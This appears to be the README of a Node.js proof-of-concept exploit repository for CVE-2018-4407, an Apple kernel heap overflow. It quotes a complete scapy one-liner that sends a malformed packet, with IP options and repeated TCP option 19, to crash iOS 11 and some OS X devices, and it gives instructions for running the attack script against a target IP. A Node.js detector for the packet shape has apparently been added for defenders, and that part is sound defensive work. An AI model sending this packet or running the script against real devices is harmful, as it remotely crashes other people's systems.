node-cve-2018-4407
Node.js PoC exploit code for CVE-2018-4407
Author: Sam Decrock
This script is based on the scapy script provided by Zuk:
iOS 12 / OS X *Remote Kernel Heap Overflow (CVE-2018-4407) POC* in a tweet:
— Zuk (@ihackbanme) November 1, 2018
pip install scapy
sudo scapy
send(IP(dst="Target IP",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
It crashes devices with iOS 11 or earlier as well as some versions of OS X.
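For defenders, the packet in the scapy line above has a recognizable shape: an IPv4 header that carries options, followed by a TCP header with two kind-19 options. The following Node.js check is an added example, not part of this repository or of Zuk's script; the function names (`parseTcpOptions`, `inspectPacket`, `sampleHeaders`) and the matching rule are assumptions, the rule matches only this packet shape, and the sample headers are constructed.

```javascript
'use strict';

// Walk the TCP option bytes; returns [{kind, length}] and stops on malformed input.
function parseTcpOptions(opts) {
  const out = [];
  let i = 0;
  while (i < opts.length) {
    const kind = opts[i];
    if (kind === 0) break;                    // End of Option List
    if (kind === 1) { i += 1; continue; }     // NOP is a single byte
    if (i + 1 >= opts.length) break;          // no room for a length byte
    const len = opts[i + 1];
    if (len < 2 || i + len > opts.length) break; // bad or truncated length
    out.push({ kind, length: len });
    i += len;
  }
  return out;
}

// Inspect a raw IPv4 packet (Buffer starting at the IP header).
// Returns null when it is not a parsable IPv4/TCP header.
function inspectPacket(pkt) {
  if (pkt.length < 20 || (pkt[0] >> 4) !== 4) return null;
  const ihl = (pkt[0] & 0x0f) * 4;            // IP header length in bytes
  if (ihl < 20 || pkt.length < ihl + 20 || pkt[9] !== 6) return null;
  const dataOff = (pkt[ihl + 12] >> 4) * 4;   // TCP header length in bytes
  if (dataOff < 20) return null;
  const end = Math.min(pkt.length, ihl + dataOff);
  const tcpOpts = parseTcpOptions(pkt.subarray(ihl + 20, end));
  const kind19Count = tcpOpts.filter((o) => o.kind === 19).length;
  const ipOptionBytes = ihl - 20;
  // Assumed rule: IP options present AND TCP option kind 19 repeated.
  return { ipOptionBytes, kind19Count, match: ipOptionBytes > 0 && kind19Count > 1 };
}

// Constructed sample headers for testing the parser (checksums and addresses left zero).
function sampleHeaders(ipOptLen, tcpOptions) {
  const tcpOpts = Buffer.concat(tcpOptions.map(([kind, dataLen]) =>
    Buffer.concat([Buffer.from([kind, dataLen + 2]), Buffer.alloc(dataLen)])));
  const ip = Buffer.alloc(20 + ipOptLen);
  ip[0] = 0x40 | (ip.length / 4);             // version 4, IHL in 32-bit words
  ip[9] = 6;                                  // protocol = TCP
  const tcp = Buffer.alloc(20);
  tcp[12] = ((20 + tcpOpts.length) / 4) << 4; // data offset in 32-bit words
  return Buffer.concat([ip, tcp, tcpOpts]);
}

console.log(inspectPacket(sampleHeaders(8, [[19, 18], [19, 18]])));
```
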
Install modules
To install its required modules, run:
npm install
Run
To run, pass the target IP address as an argument:
node attack.js 192.168.1.20
More information
Original write-up by Kevin Backhouse: https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407